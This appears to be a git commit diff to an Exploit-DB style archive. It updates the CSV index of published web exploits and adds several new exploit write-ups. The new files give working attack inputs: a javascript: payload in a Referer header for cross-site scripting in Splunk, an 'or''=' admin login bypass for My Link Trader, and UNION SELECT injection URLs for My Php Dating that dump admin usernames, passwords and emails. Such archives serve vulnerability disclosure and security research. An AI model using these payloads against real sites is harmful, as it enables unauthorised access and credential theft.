39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
|
||||
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
|
||||
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
|
||||
|
|
@ -36635,7 +36636,7 @@ id,file,description,date,author,platform,type,port
|
|||
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
|
||||
39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
|
||||
39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
|
||||
39977,platforms/php/webapps/39977.txt,"Joomla! Component com_bt_media 1.0 - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
|
||||
39978,platforms/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
|
||||
39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80
|
||||
39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80
|
||||
|
|
@ -36647,7 +36648,7 @@ id,file,description,date,author,platform,type,port
|
|||
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
|
||||
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
|
||||
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
|
||||
40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
|
||||
40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
|
||||
40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
|
||||
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
|
||||
40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,php,webapps,80
|
||||
|
|
@ -36938,4 +36939,7 @@ id,file,description,date,author,platform,type,port
|
|||
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
|
||||
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
|
||||
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
|
||||
40996,platforms/php/webapps/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,webapps,0
|
||||
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
|
||||
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
|
||||
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
|
||||
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -217,7 +217,7 @@ if ($s==1){
|
|||
$count=0;
|
||||
$res=nl2br(htmlentities($html));
|
||||
$str =
|
||||
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
|
||||
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
|
||||
foreach ($str as $value){
|
||||
$pos = strpos($res, $value);
|
||||
if ($pos === false) {
|
||||
|
|
|
|||
|
|
@ -4,4 +4,4 @@ The 'com_community' component for Joomla! is prone to an SQL-injection vulnerabi
|
|||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_community&view=profile&userid=156
|
||||
http://www.example.com/index.php?option=com_community&view=profile&userid=156
|
||||
29
platforms/php/webapps/40997.txt
Executable file
29
platforms/php/webapps/40997.txt
Executable file
|
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Splunk 'Referer' Header Cross Site Scripting Vulnerability
|
||||
# Date: 7th January 2017
|
||||
# Exploit Author: justpentest
|
||||
# Vendor Homepage: http://www.splunk.com/
|
||||
# Version: Splunk 6.1.1 other versions may also be affected.
|
||||
# Contact: transform2secure@gmail.com
|
||||
|
||||
|
||||
Source: http://www.securityfocus.com/bid/67655/info
|
||||
|
||||
1) Description:
|
||||
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
2) Exploit:
|
||||
|
||||
URL: http://justpentest.com:8000/en-US/app/
|
||||
|
||||
GET /en-US/app/ HTTP/1.1
|
||||
Host=justpentest.com:8000
|
||||
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
|
||||
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language=en-US,en;q=0.5
|
||||
Accept-Encoding=gzip, deflate
|
||||
Referer=javascript:prompt("XXS by justpentest");
|
||||
Connection=keep-alive
|
||||
----------------------------------------------------------------------------------------
|
||||
Response:
|
||||
<p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>
|
||||
13
platforms/php/webapps/40998.txt
Executable file
13
platforms/php/webapps/40998.txt
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
# # # # #
|
||||
# Vulnerability:: Admin Login Bypass & SQLi
|
||||
# Date:09.01.2017
|
||||
# Vendor Homepage: http://software.friendsinwar.com/
|
||||
# Script Name: My Link Trader
|
||||
# Script Version: v1.1
|
||||
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
|
||||
# Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
||||
34
platforms/php/webapps/40999.txt
Executable file
34
platforms/php/webapps/40999.txt
Executable file
|
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
|
||||
# Google Dork: My Php Dating
|
||||
# Date:09.01.2017
|
||||
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
|
||||
# Tested on: http://www.phponlinedatingsoftware.com/demo/
|
||||
# Script Name: My Php Dating
|
||||
# Script Version: 2.0
|
||||
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
|
||||
# Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/view_image.php?path=[SQL]
|
||||
# # # # #
|
||||
|
||||
|
||||
--------------------------------------------------
|
||||
Note:
|
||||
|
||||
Rate: 0/10 [Rate Picture] <<<Link
|
||||
--------------------------------------------------
|
||||
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
|
||||
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
|
||||
--------------------------------------------------
|
||||
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--
|
||||
|
||||
--------------------------------------------------
|
||||
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--
|
||||
|
||||
--------------------------------------------------
|
||||
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
|
||||
|
||||
23
platforms/php/webapps/41001.txt
Executable file
23
platforms/php/webapps/41001.txt
Executable file
|
|
@ -0,0 +1,23 @@
|
|||
# Vulnerability: My Php Dating 2.0 - SQL Injection
|
||||
|
||||
# Google Dork: use your mind
|
||||
|
||||
# Date: 09.01.2017
|
||||
|
||||
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
|
||||
|
||||
# Tested on: win7
|
||||
|
||||
# Author: Nassim Asrir
|
||||
|
||||
# Author Company: Henceforth
|
||||
|
||||
# Contact: wassline@gmail.com
|
||||
#########################
|
||||
|
||||
|
||||
# SQL Injection/Exploit :
|
||||
|
||||
# Vulnerable Parametre : id
|
||||
|
||||
# http://localhost/[PATH]/view_profile.php?id=[SQL]
|
||||
Loading…
Add table
Reference in a new issue